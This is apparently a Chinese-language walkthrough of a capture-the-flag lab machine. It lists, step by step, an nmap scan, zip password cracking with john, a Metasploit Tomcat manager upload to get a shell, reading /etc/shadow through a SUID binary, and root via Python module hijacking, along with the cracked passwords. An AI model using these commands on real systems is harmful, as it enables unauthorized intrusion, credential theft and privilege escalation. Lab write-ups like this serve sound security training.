kali:192.168.111.111
靶机:192.168.111.131
信息收集
端口扫描
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.131
通过nmap脚本枚举出8080端口存在backup.zip文件,下载后解压发现需要密码,利用john爆破压缩包密码
得到密码:@administrator_hi5
zip2john backup.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
解压后查看tomcat-users.xml得到tomcat后台账号密码
利用msf模块exploit/multi/http/tomcat_mgr_upload拿shell
msfdb run
use exploit/multi/http/tomcat_mgr_upload
set rport 8080
set rhosts 192.168.111.131
set httpusername admin
set httppassword melehifokivai
set FingerprintCheck false
run
提权
利用之前得到的密码:melehifokivai,切换到jaye用户
查找suid权限的文件
find / -perm -u=s -exec ls -al {} \; 2> /dev/null
利用该程序可以读取任意文件:https://gtfobins.github.io/gtfobins/look/#suid
查看目标/etc/shadow文件
./look '' "/etc/shadow"
利用john爆破randy用户密码密文,得到密码:07051986randy
切换到randy用户后查看sudo权限
查看randombase64.py发现引入base64模块,修改base64模块提权
查找base64模块位置
在文件最后加上提权代码
import os
os.system("/bin/bash")
之后执行该脚本提升为root
sudo -u root /usr/bin/python3.8 /home/randy/randombase64.py
